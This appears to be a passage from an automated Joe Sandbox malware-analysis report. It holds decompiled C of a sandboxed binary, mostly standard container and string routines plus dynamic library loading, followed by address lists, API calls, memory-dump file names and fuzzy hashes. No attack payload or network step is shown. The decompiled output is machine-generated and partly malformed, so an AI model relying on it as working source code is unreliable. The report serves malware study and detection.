                                                                                        												} else {
                                                                                        													__eflags = _t421 - 0x7fffffff;
                                                                                        													if(__eflags > 0) {
                                                                                        														L78();
                                                                                        														goto L77;
                                                                                        													} else {
                                                                                        														_push(_t320);
                                                                                        														_t320 = _t421 + _t421;
                                                                                        														__eflags = _t320 - 0x1000;
                                                                                        														if(_t320 < 0x1000) {
                                                                                        															__eflags = _t320;
                                                                                        															if(__eflags == 0) {
                                                                                        																_t281 = 0;
                                                                                        																__eflags = 0;
                                                                                        															} else {
                                                                                        																_push(_t320);
                                                                                        																_t281 = E1000299C(_t358, _t421, __eflags);
                                                                                        															}
                                                                                        															goto L71;
                                                                                        														} else {
                                                                                        															_t153 = _t320 + 0x23; // 0x23
                                                                                        															_t285 = _t153;
                                                                                        															__eflags = _t285 - _t320;
                                                                                        															_t286 =  <=  ? _t358 | 0xffffffff : _t285;
                                                                                        															_push( <=  ? _t358 | 0xffffffff : _t285);
                                                                                        															_t358 = E1000299C(_t358 | 0xffffffff, _t421, _t285 - _t320);
                                                                                        															_t451 = _t451 + 4;
                                                                                        															__eflags = _t358;
                                                                                        															if(__eflags == 0) {
                                                                                        																L77:
                                                                                        																E100061DF(_t320, _t358, _t393, _t407, __eflags);
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																E10002942("vector<T> too long");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																_push(_t440);
                                                                                        																_t442 = _t451;
                                                                                        																_push(_t358);
                                                                                        																_t256 = _v224;
                                                                                        																_push(_t320);
                                                                                        																_push(_t421);
                                                                                        																_push(_t407);
                                                                                        																_t409 = _t358;
                                                                                        																_t359 =  *(_t409 + 0x14);
                                                                                        																_v240 = _t359;
                                                                                        																__eflags = _t256 - _t359;
                                                                                        																if(_t256 > _t359) {
                                                                                        																	__eflags = _t256 - 0x7ffffffe;
                                                                                        																	if(_t256 > 0x7ffffffe) {
                                                                                        																		L104:
                                                                                        																		L105();
                                                                                        																		asm("int3");
                                                                                        																		asm("int3");
                                                                                        																		asm("int3");
                                                                                        																		asm("int3");
                                                                                        																		asm("int3");
                                                                                        																		E10002942("string too long");
                                                                                        																		asm("int3");
                                                                                        																		_push(_t442);
                                                                                        																		_push(_t421);
                                                                                        																		_t423 = _t359;
                                                                                        																		E1000284E(_t359, _v252);
                                                                                        																		 *_t423 = 0x10013194;
                                                                                        																		return _t423;
                                                                                        																	} else {
                                                                                        																		_t426 = _t256 | 0x00000007;
                                                                                        																		__eflags = _t426 - 0x7ffffffe;
                                                                                        																		if(_t426 <= 0x7ffffffe) {
                                                                                        																			_t393 = _t359 >> 1;
                                                                                        																			__eflags = _t359 - 0x7ffffffe - _t393;
                                                                                        																			if(_t359 <= 0x7ffffffe - _t393) {
                                                                                        																				_t262 = _t393 + _t359;
                                                                                        																				__eflags = _t426 - _t262;
                                                                                        																				_t421 =  <  ? _t262 : _t426;
                                                                                        																			} else {
                                                                                        																				_t421 = 0x7ffffffe;
                                                                                        																			}
                                                                                        																		} else {
                                                                                        																			_t421 = 0x7ffffffe;
                                                                                        																		}
                                                                                        																		_t168 = _t421 + 1; // 0x7fffffff
                                                                                        																		_t263 = _t168;
                                                                                        																		_t360 = _t263 + _t263;
                                                                                        																		__eflags = _t263 - 0x7fffffff;
                                                                                        																		if(_t263 <= 0x7fffffff) {
                                                                                        																			__eflags = _t360 - 0x1000;
                                                                                        																			if(_t360 < 0x1000) {
                                                                                        																				__eflags = _t360;
                                                                                        																				if(__eflags == 0) {
                                                                                        																					_t320 = 0;
                                                                                        																					__eflags = 0;
                                                                                        																				} else {
                                                                                        																					_push(_t360);
                                                                                        																					_t274 = E1000299C(_t360, _t421, __eflags);
                                                                                        																					_t451 = _t451 + 4;
                                                                                        																					_t320 = _t274;
                                                                                        																				}
                                                                                        																				goto L97;
                                                                                        																			} else {
                                                                                        																				goto L92;
                                                                                        																			}
                                                                                        																		} else {
                                                                                        																			_t360 = _t360 | 0xffffffff;
                                                                                        																			L92:
                                                                                        																			_t275 = _t360 + 0x23;
                                                                                        																			_t395 = _t393 | 0xffffffff;
                                                                                        																			__eflags = _t275 - _t360;
                                                                                        																			_t276 =  <=  ? _t393 | 0xffffffff : _t275;
                                                                                        																			_push( <=  ? _t393 | 0xffffffff : _t275);
                                                                                        																			_t277 = E1000299C(_t360, _t421, _t275 - _t360);
                                                                                        																			_t451 = _t451 + 4;
                                                                                        																			__eflags = _t277;
                                                                                        																			if(__eflags == 0) {
                                                                                        																				L103:
                                                                                        																				E100061DF(_t320, _t359, _t395, _t409, __eflags);
                                                                                        																				goto L104;
                                                                                        																			} else {
                                                                                        																				_t171 = _t277 + 0x23; // 0x23
                                                                                        																				_t320 = _t171 & 0xffffffe0;
                                                                                        																				 *(_t320 - 4) = _t277;
                                                                                        																				L97:
                                                                                        																				_t264 = _v8;
                                                                                        																				 *(_t409 + 0x14) = _t421;
                                                                                        																				 *(_t409 + 0x10) = _t264;
                                                                                        																				_t421 = _t264 + _t264;
                                                                                        																				E10005A60(_t320, _v12, _t421);
                                                                                        																				_t451 = _t451 + 0xc;
                                                                                        																				 *((short*)(_t421 + _t320)) = 0;
                                                                                        																				_t267 = _v24;
                                                                                        																				__eflags = _t267 - 8;
                                                                                        																				if(_t267 < 8) {
                                                                                        																					L102:
                                                                                        																					 *_t409 = _t320;
                                                                                        																					return _t409;
                                                                                        																				} else {
                                                                                        																					_t361 = 2 + _t267 * 2;
                                                                                        																					_t269 =  *_t409;
                                                                                        																					__eflags = _t361 - 0x1000;
                                                                                        																					if(_t361 < 0x1000) {
                                                                                        																						L101:
                                                                                        																						_push(_t361);
                                                                                        																						E10002980(_t269);
                                                                                        																						goto L102;
                                                                                        																					} else {
                                                                                        																						_t395 =  *(_t269 - 4);
                                                                                        																						_t359 = _t361 + 0x23;
                                                                                        																						__eflags = _t269 - _t395 + 0xfffffffc - 0x1f;
                                                                                        																						if(__eflags > 0) {
                                                                                        																							goto L103;
                                                                                        																						} else {
                                                                                        																							_t269 = _t395;
                                                                                        																							goto L101;
                                                                                        																						}
                                                                                        																					}
                                                                                        																				}
                                                                                        																			}
                                                                                        																		}
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	_t324 = _t409;
                                                                                        																	__eflags = _t359 - 8;
                                                                                        																	if(_t359 >= 8) {
                                                                                        																		_t324 =  *_t409;
                                                                                        																	}
                                                                                        																	_t428 = _t256 + _t256;
                                                                                        																	 *(_t409 + 0x10) = _t256;
                                                                                        																	E100053A0(_t324, _v12, _t428);
                                                                                        																	__eflags = 0;
                                                                                        																	 *((short*)(_t428 + _t324)) = 0;
                                                                                        																	return _t409;
                                                                                        																}
                                                                                        															} else {
                                                                                        																_t154 = _t358 + 0x23; // 0x23
                                                                                        																_t281 = _t154 & 0xffffffe0;
                                                                                        																 *(_t281 - 4) = _t358;
                                                                                        																L71:
                                                                                        																 *_t407 = _t281;
                                                                                        																 *(_t407 + 4) = _t281;
                                                                                        																 *(_t407 + 8) =  *_t407 + _t320;
                                                                                        																_t362 =  *_t407;
                                                                                        																__eflags = _t421;
                                                                                        																if(_t421 != 0) {
                                                                                        																	_t396 = _v4;
                                                                                        																	do {
                                                                                        																		 *_t362 =  *_t396;
                                                                                        																		_t362 = _t362 + 2;
                                                                                        																		_t421 = _t421 - 1;
                                                                                        																		__eflags = _t421;
                                                                                        																	} while (_t421 != 0);
                                                                                        																}
                                                                                        																 *(_t407 + 4) = _t362;
                                                                                        																goto L75;
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t249 = _t358;
                                                                                        												goto L60;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									goto L47;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        			}


























































































































                                                                                        0x10001dd1
                                                                                        0x10001dd9
                                                                                        0x10001de0
                                                                                        0x10001de4
                                                                                        0x10001de6
                                                                                        0x10001de8
                                                                                        0x10001df3
                                                                                        0x10001df4
                                                                                        0x10001df5
                                                                                        0x10001dfb
                                                                                        0x10001e00
                                                                                        0x10001e02
                                                                                        0x10001e07
                                                                                        0x10001e0b
                                                                                        0x10001e11
                                                                                        0x10001e17
                                                                                        0x10001e1e
                                                                                        0x10001e24
                                                                                        0x10001e26
                                                                                        0x10001e2c
                                                                                        0x10001e30
                                                                                        0x10001e3a
                                                                                        0x10001e45
                                                                                        0x10001e4d
                                                                                        0x10001e53
                                                                                        0x10001e5a
                                                                                        0x10001e5f
                                                                                        0x10001e66
                                                                                        0x10001e69
                                                                                        0x10001e6d
                                                                                        0x10001e70
                                                                                        0x10001e74
                                                                                        0x10001e79
                                                                                        0x10001e7e
                                                                                        0x10001e82
                                                                                        0x10001e86
                                                                                        0x10001e8a
                                                                                        0x10001e8e
                                                                                        0x10001e97
                                                                                        0x10001e9a
                                                                                        0x10001e9e
                                                                                        0x10001ea2
                                                                                        0x10001eab
                                                                                        0x10001eaf
                                                                                        0x10001eb4
                                                                                        0x10001ebb
                                                                                        0x10001ec3
                                                                                        0x10001ec8
                                                                                        0x10001ecd
                                                                                        0x10001ed5
                                                                                        0x10001ed9
                                                                                        0x10001edd
                                                                                        0x10001ee0
                                                                                        0x10001ee8
                                                                                        0x10001eeb
                                                                                        0x10001eef
                                                                                        0x10001ef3
                                                                                        0x10001ef8
                                                                                        0x10001efd
                                                                                        0x10001f01
                                                                                        0x10001f05
                                                                                        0x10001f09
                                                                                        0x10001f0c
                                                                                        0x10001f10
                                                                                        0x10001f14
                                                                                        0x10001f1d
                                                                                        0x10001f21
                                                                                        0x10001f26
                                                                                        0x10001f2b
                                                                                        0x10001f30
                                                                                        0x10001f38
                                                                                        0x10001f40
                                                                                        0x10001f44
                                                                                        0x10001f44
                                                                                        0x10001f50
                                                                                        0x10001f76
                                                                                        0x10001f7e
                                                                                        0x10001f7f
                                                                                        0x10001f8b
                                                                                        0x10001f91
                                                                                        0x10001f99
                                                                                        0x10002587
                                                                                        0x1000258a
                                                                                        0x10002597
                                                                                        0x100025a4
                                                                                        0x10001f9f
                                                                                        0x10001f9f
                                                                                        0x10001fa5
                                                                                        0x10001fac
                                                                                        0x10001faf
                                                                                        0x10001fb5
                                                                                        0x10001fb8
                                                                                        0x10001fba
                                                                                        0x10001fc0
                                                                                        0x10001fc7
                                                                                        0x10002110
                                                                                        0x1000212e
                                                                                        0x10002139
                                                                                        0x1000213d
                                                                                        0x1000213e
                                                                                        0x10001fcd
                                                                                        0x10001fcd
                                                                                        0x10001fd9
                                                                                        0x10001fe0
                                                                                        0x10001fe7
                                                                                        0x10001fee
                                                                                        0x10001ff7
                                                                                        0x10001ffe
                                                                                        0x10002002
                                                                                        0x10002002
                                                                                        0x10002009
                                                                                        0x1000200e
                                                                                        0x10002012
                                                                                        0x10002015
                                                                                        0x10002018
                                                                                        0x1000201c
                                                                                        0x10002020
                                                                                        0x10002025
                                                                                        0x1000202a
                                                                                        0x1000202e
                                                                                        0x10002032
                                                                                        0x10002036
                                                                                        0x10002039
                                                                                        0x1000203d
                                                                                        0x10002041
                                                                                        0x10002046
                                                                                        0x1000204a
                                                                                        0x1000204f
                                                                                        0x10002054
                                                                                        0x10002059
                                                                                        0x10002061
                                                                                        0x10002065
                                                                                        0x10002069
                                                                                        0x1000206d
                                                                                        0x10002073
                                                                                        0x10002077
                                                                                        0x1000207b
                                                                                        0x10002080
                                                                                        0x10002086
                                                                                        0x1000208a
                                                                                        0x1000208d
                                                                                        0x10002090
                                                                                        0x10002094
                                                                                        0x10002098
                                                                                        0x1000209d
                                                                                        0x100020a2
                                                                                        0x100020a6
                                                                                        0x100020aa
                                                                                        0x100020ae
                                                                                        0x100020b1
                                                                                        0x100020b5
                                                                                        0x100020b9
                                                                                        0x100020be
                                                                                        0x100020c2
                                                                                        0x100020c7
                                                                                        0x100020cc
                                                                                        0x100020d1
                                                                                        0x100020d9
                                                                                        0x100020dd
                                                                                        0x100020e1
                                                                                        0x100020e5
                                                                                        0x100020eb
                                                                                        0x100020ef
                                                                                        0x100020f5
                                                                                        0x100020f8
                                                                                        0x10002101
                                                                                        0x1000210a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000210a
                                                                                        0x10002153
                                                                                        0x10002159
                                                                                        0x10002161
                                                                                        0x1000257b
                                                                                        0x10002581
                                                                                        0x00000000
                                                                                        0x10002167
                                                                                        0x10002167
                                                                                        0x1000216e
                                                                                        0x10002174
                                                                                        0x10002176
                                                                                        0x1000217c
                                                                                        0x1000217f
                                                                                        0x10002183
                                                                                        0x10002187
                                                                                        0x1000218f
                                                                                        0x10002197
                                                                                        0x1000219d
                                                                                        0x100021a9
                                                                                        0x100021b0
                                                                                        0x100021b3
                                                                                        0x100021b7
                                                                                        0x100021ba
                                                                                        0x100021be
                                                                                        0x100021c3
                                                                                        0x100021c8
                                                                                        0x100021cd
                                                                                        0x100021d1
                                                                                        0x100021d5
                                                                                        0x100021d9
                                                                                        0x100021e2
                                                                                        0x100021e5
                                                                                        0x100021ee
                                                                                        0x100021f2
                                                                                        0x100021f6
                                                                                        0x100021ff
                                                                                        0x10002203
                                                                                        0x10002208
                                                                                        0x1000220f
                                                                                        0x10002217
                                                                                        0x1000221c
                                                                                        0x10002221
                                                                                        0x10002229
                                                                                        0x1000222d
                                                                                        0x10002231
                                                                                        0x10002235
                                                                                        0x10002238
                                                                                        0x1000223d
                                                                                        0x10002240
                                                                                        0x10002244
                                                                                        0x10002248
                                                                                        0x1000224d
                                                                                        0x10002252
                                                                                        0x10002256
                                                                                        0x1000225a
                                                                                        0x1000225e
                                                                                        0x10002261
                                                                                        0x10002265
                                                                                        0x10002269
                                                                                        0x10002272
                                                                                        0x10002276
                                                                                        0x1000227b
                                                                                        0x10002280
                                                                                        0x10002285
                                                                                        0x1000228d
                                                                                        0x10002291
                                                                                        0x10002296
                                                                                        0x1000229a
                                                                                        0x1000229a
                                                                                        0x100022a0
                                                                                        0x100022c6
                                                                                        0x100022cb
                                                                                        0x100022cc
                                                                                        0x100022d3
                                                                                        0x100022da
                                                                                        0x100022dd
                                                                                        0x100022e4
                                                                                        0x100022e8
                                                                                        0x100022f0
                                                                                        0x100022f0
                                                                                        0x100022f3
                                                                                        0x100022f6
                                                                                        0x10002307
                                                                                        0x1000230c
                                                                                        0x1000231a
                                                                                        0x10002325
                                                                                        0x10002327
                                                                                        0x1000232e
                                                                                        0x10002330
                                                                                        0x10002339
                                                                                        0x1000233d
                                                                                        0x1000233d
                                                                                        0x10002340
                                                                                        0x10002340
                                                                                        0x10002343
                                                                                        0x10002346
                                                                                        0x1000234f
                                                                                        0x10002350
                                                                                        0x10002354
                                                                                        0x10002359
                                                                                        0x1000235d
                                                                                        0x1000235f
                                                                                        0x10002364
                                                                                        0x10002367
                                                                                        0x1000236d
                                                                                        0x10002371
                                                                                        0x10002397
                                                                                        0x1000239c
                                                                                        0x1000239d
                                                                                        0x100023a2
                                                                                        0x100023a5
                                                                                        0x100023b0
                                                                                        0x100023b0
                                                                                        0x100023b3
                                                                                        0x100023b6
                                                                                        0x100023bb
                                                                                        0x100023c0
                                                                                        0x100023c6
                                                                                        0x100023cc
                                                                                        0x100023d2
                                                                                        0x100023d5
                                                                                        0x100023dd
                                                                                        0x100023e5
                                                                                        0x10002498
                                                                                        0x10002498
                                                                                        0x1000249e
                                                                                        0x100024a0
                                                                                        0x100024a8
                                                                                        0x100024ac
                                                                                        0x100024b1
                                                                                        0x100024d7
                                                                                        0x100024dc
                                                                                        0x100024dd
                                                                                        0x100024dd
                                                                                        0x100024e2
                                                                                        0x100024e5
                                                                                        0x100024f0
                                                                                        0x100024f0
                                                                                        0x100024f3
                                                                                        0x100024f6
                                                                                        0x100024f6
                                                                                        0x10002504
                                                                                        0x10002504
                                                                                        0x10002506
                                                                                        0x10002508
                                                                                        0x10002509
                                                                                        0x1000250a
                                                                                        0x100023eb
                                                                                        0x100023ee
                                                                                        0x100023f1
                                                                                        0x100023f3
                                                                                        0x10002400
                                                                                        0x10002402
                                                                                        0x10002407
                                                                                        0x1000240b
                                                                                        0x1000240d
                                                                                        0x1000240f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10002414
                                                                                        0x10002424
                                                                                        0x10002424
                                                                                        0x00000000
                                                                                        0x10002416
                                                                                        0x1000241b
                                                                                        0x1000241e
                                                                                        0x10002422
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10002422
                                                                                        0x10002416
                                                                                        0x10002426
                                                                                        0x10002426
                                                                                        0x10002428
                                                                                        0x10002430
                                                                                        0x10002436
                                                                                        0x10002438
                                                                                        0x1000243b
                                                                                        0x1000243e
                                                                                        0x10002444
                                                                                        0x1000247a
                                                                                        0x1000247a
                                                                                        0x10002480
                                                                                        0x10002483
                                                                                        0x00000000
                                                                                        0x10002446
                                                                                        0x10002446
                                                                                        0x1000244e
                                                                                        0x10002454
                                                                                        0x10002457
                                                                                        0x1000245d
                                                                                        0x10002462
                                                                                        0x1000248e
                                                                                        0x1000248e
                                                                                        0x10002496
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10002464
                                                                                        0x10002464
                                                                                        0x1000246a
                                                                                        0x1000246d
                                                                                        0x1000246e
                                                                                        0x10002478
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10002478
                                                                                        0x00000000
                                                                                        0x10002462
                                                                                        0x00000000
                                                                                        0x1000245d
                                                                                        0x10002444
                                                                                        0x00000000
                                                                                        0x10002430
                                                                                        0x10002400
                                                                                        0x1000250f
                                                                                        0x1000250f
                                                                                        0x1000250f
                                                                                        0x10002512
                                                                                        0x10002515
                                                                                        0x10002518
                                                                                        0x10002545
                                                                                        0x10002545
                                                                                        0x10002548
                                                                                        0x1000254b
                                                                                        0x00000000
                                                                                        0x1000254d
                                                                                        0x1000254d
                                                                                        0x10002550
                                                                                        0x10002557
                                                                                        0x10002559
                                                                                        0x1000255f
                                                                                        0x10002571
                                                                                        0x10002571
                                                                                        0x10002573
                                                                                        0x00000000
                                                                                        0x10002561
                                                                                        0x10002561
                                                                                        0x10002564
                                                                                        0x1000256c
                                                                                        0x1000256f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000256f
                                                                                        0x1000255f
                                                                                        0x1000251a
                                                                                        0x1000251a
                                                                                        0x10002521
                                                                                        0x10002523
                                                                                        0x10002529
                                                                                        0x1000253b
                                                                                        0x1000253b
                                                                                        0x1000253d
                                                                                        0x10002542
                                                                                        0x00000000
                                                                                        0x1000252b
                                                                                        0x1000252b
                                                                                        0x1000252e
                                                                                        0x10002536
                                                                                        0x10002539
                                                                                        0x100025a5
                                                                                        0x100025aa
                                                                                        0x100025aa
                                                                                        0x100025af
                                                                                        0x100025b0
                                                                                        0x100025b1
                                                                                        0x100025b3
                                                                                        0x100025b5
                                                                                        0x100025b7
                                                                                        0x100025f9
                                                                                        0x100025fa
                                                                                        0x100025b9
                                                                                        0x100025be
                                                                                        0x100025c1
                                                                                        0x100025c7
                                                                                        0x100025db
                                                                                        0x100025db
                                                                                        0x100025dd
                                                                                        0x100025e2
                                                                                        0x100025eb
                                                                                        0x100025f2
                                                                                        0x00000000
                                                                                        0x100025c9
                                                                                        0x100025c9
                                                                                        0x100025cc
                                                                                        0x100025d4
                                                                                        0x100025d7
                                                                                        0x100025fb
                                                                                        0x10002600
                                                                                        0x10002601
                                                                                        0x10002602
                                                                                        0x10002603
                                                                                        0x10002604
                                                                                        0x10002605
                                                                                        0x10002606
                                                                                        0x10002607
                                                                                        0x10002608
                                                                                        0x10002609
                                                                                        0x1000260a
                                                                                        0x1000260b
                                                                                        0x1000260c
                                                                                        0x1000260d
                                                                                        0x1000260e
                                                                                        0x1000260f
                                                                                        0x10002610
                                                                                        0x10002611
                                                                                        0x10002613
                                                                                        0x10002614
                                                                                        0x10002617
                                                                                        0x10002618
                                                                                        0x1000261a
                                                                                        0x10002620
                                                                                        0x10002627
                                                                                        0x1000262e
                                                                                        0x10002630
                                                                                        0x100026a3
                                                                                        0x100026a8
                                                                                        0x10002632
                                                                                        0x10002632
                                                                                        0x10002638
                                                                                        0x100026ab
                                                                                        0x00000000
                                                                                        0x1000263a
                                                                                        0x1000263a
                                                                                        0x1000263b
                                                                                        0x1000263e
                                                                                        0x10002644
                                                                                        0x1000266b
                                                                                        0x1000266d
                                                                                        0x1000267a
                                                                                        0x1000267a
                                                                                        0x1000266f
                                                                                        0x1000266f
                                                                                        0x10002670
                                                                                        0x10002675
                                                                                        0x00000000
                                                                                        0x10002646
                                                                                        0x10002646
                                                                                        0x10002646
                                                                                        0x1000264c
                                                                                        0x1000264e
                                                                                        0x10002651
                                                                                        0x10002657
                                                                                        0x10002659
                                                                                        0x1000265c
                                                                                        0x1000265e
                                                                                        0x100026b0
                                                                                        0x100026b0
                                                                                        0x100026b5
                                                                                        0x100026b6
                                                                                        0x100026b7
                                                                                        0x100026b8
                                                                                        0x100026b9
                                                                                        0x100026ba
                                                                                        0x100026bb
                                                                                        0x100026bc
                                                                                        0x100026bd
                                                                                        0x100026be
                                                                                        0x100026bf
                                                                                        0x100026c5
                                                                                        0x100026ca
                                                                                        0x100026cb
                                                                                        0x100026cc
                                                                                        0x100026cd
                                                                                        0x100026ce
                                                                                        0x100026cf
                                                                                        0x100026d0
                                                                                        0x100026d1
                                                                                        0x100026d3
                                                                                        0x100026d4
                                                                                        0x100026d7
                                                                                        0x100026d8
                                                                                        0x100026d9
                                                                                        0x100026da
                                                                                        0x100026dc
                                                                                        0x100026df
                                                                                        0x100026e2
                                                                                        0x100026e4
                                                                                        0x10002713
                                                                                        0x10002718
                                                                                        0x10002806
                                                                                        0x10002806
                                                                                        0x1000280b
                                                                                        0x1000280c
                                                                                        0x1000280d
                                                                                        0x1000280e
                                                                                        0x1000280f
                                                                                        0x10002815
                                                                                        0x1000281a
                                                                                        0x1000281b
                                                                                        0x1000281e
                                                                                        0x10002822
                                                                                        0x10002824
                                                                                        0x10002829
                                                                                        0x10002833
                                                                                        0x1000271e
                                                                                        0x10002720
                                                                                        0x10002723
                                                                                        0x10002729
                                                                                        0x10002739
                                                                                        0x1000273d
                                                                                        0x1000273f
                                                                                        0x10002748
                                                                                        0x1000274b
                                                                                        0x1000274d
                                                                                        0x10002741
                                                                                        0x10002741
                                                                                        0x10002741
                                                                                        0x1000272b
                                                                                        0x1000272b
                                                                                        0x1000272b
                                                                                        0x10002750
                                                                                        0x10002750
                                                                                        0x10002753
                                                                                        0x10002756
                                                                                        0x1000275b
                                                                                        0x10002762
                                                                                        0x10002768
                                                                                        0x1000278d
                                                                                        0x1000278f
                                                                                        0x1000279e
                                                                                        0x1000279e
                                                                                        0x10002791
                                                                                        0x10002791
                                                                                        0x10002792
                                                                                        0x10002797
                                                                                        0x1000279a
                                                                                        0x1000279a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000275d
                                                                                        0x1000275d
                                                                                        0x1000276a
                                                                                        0x1000276a
                                                                                        0x1000276d
                                                                                        0x10002770
                                                                                        0x10002772
                                                                                        0x10002775
                                                                                        0x10002776
                                                                                        0x1000277b
                                                                                        0x1000277e
                                                                                        0x10002780
                                                                                        0x10002801
                                                                                        0x10002801
                                                                                        0x00000000
                                                                                        0x10002782
                                                                                        0x10002782
                                                                                        0x10002785
                                                                                        0x10002788
                                                                                        0x100027a0
                                                                                        0x100027a0
                                                                                        0x100027a3
                                                                                        0x100027a6
                                                                                        0x100027a9
                                                                                        0x100027b1
                                                                                        0x100027b8
                                                                                        0x100027bb
                                                                                        0x100027bf
                                                                                        0x100027c2
                                                                                        0x100027c5
                                                                                        0x100027f4
                                                                                        0x100027f4
                                                                                        0x100027fe
                                                                                        0x100027c7
                                                                                        0x100027c7
                                                                                        0x100027ce
                                                                                        0x100027d0
                                                                                        0x100027d6
                                                                                        0x100027ea
                                                                                        0x100027ea
                                                                                        0x100027ec
                                                                                        0x00000000
                                                                                        0x100027d8
                                                                                        0x100027d8
                                                                                        0x100027db
                                                                                        0x100027e3
                                                                                        0x100027e6
                                                                                        0x00000000
                                                                                        0x100027e8
                                                                                        0x100027e8
                                                                                        0x00000000
                                                                                        0x100027e8
                                                                                        0x100027e6
                                                                                        0x100027d6
                                                                                        0x100027c5
                                                                                        0x10002780
                                                                                        0x1000275b
                                                                                        0x100026e6
                                                                                        0x100026e6
                                                                                        0x100026e8
                                                                                        0x100026eb
                                                                                        0x100026ed
                                                                                        0x100026ed
                                                                                        0x100026ef
                                                                                        0x100026f2
                                                                                        0x100026fa
                                                                                        0x10002702
                                                                                        0x10002704
                                                                                        0x10002710
                                                                                        0x10002710
                                                                                        0x10002660
                                                                                        0x10002660
                                                                                        0x10002663
                                                                                        0x10002666
                                                                                        0x1000267c
                                                                                        0x1000267c
                                                                                        0x1000267e
                                                                                        0x10002685
                                                                                        0x10002688
                                                                                        0x1000268b
                                                                                        0x1000268d
                                                                                        0x1000268f
                                                                                        0x10002692
                                                                                        0x10002695
                                                                                        0x10002698
                                                                                        0x1000269b
                                                                                        0x1000269b
                                                                                        0x1000269b
                                                                                        0x10002692
                                                                                        0x100026a0
                                                                                        0x00000000
                                                                                        0x100026a0
                                                                                        0x1000265e
                                                                                        0x10002644
                                                                                        0x10002638
                                                                                        0x100025d9
                                                                                        0x100025d9
                                                                                        0x00000000
                                                                                        0x100025d9
                                                                                        0x100025d7
                                                                                        0x100025c7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10002539
                                                                                        0x10002529
                                                                                        0x10002518
                                                                                        0x10002161

                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(?,CFB68A75), ref: 10001F8B
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 10002153
                                                                                        • FreeLibrary.KERNEL32(?), ref: 10002581
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: : $,L$OPTYN\P[n%./D
                                                                                        • API String ID: 145871493-3822636520
                                                                                        • Opcode ID: b5ec54833f141e83cae29550be1f448aae7f265be6e1551783e2a3f423bc69c9
                                                                                        • Instruction ID: e42cf98e40f6ab651ea8f5174d117130f8e894b4efbd8f0b6f7c79b193a6929d
                                                                                        • Opcode Fuzzy Hash: b5ec54833f141e83cae29550be1f448aae7f265be6e1551783e2a3f423bc69c9
                                                                                        • Instruction Fuzzy Hash: 5B222936D216558BF702CB78C8513D9F7B4EF6A285F55C31AE805B6666FB30A7C28B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • ExitThread.KERNEL32 ref: 006B33BA
                                                                                        • CloseHandle.KERNEL32(?,?,?,006B356E,?,?,006B3351,00000000), ref: 006B33E2
                                                                                        • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,006B356E,?,?,006B3351,00000000), ref: 006B33F8
                                                                                        • _free.LIBCMT ref: 006B3413
                                                                                        • GetModuleHandleExW.KERNEL32(00000004,?,0000000C), ref: 006B3431
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
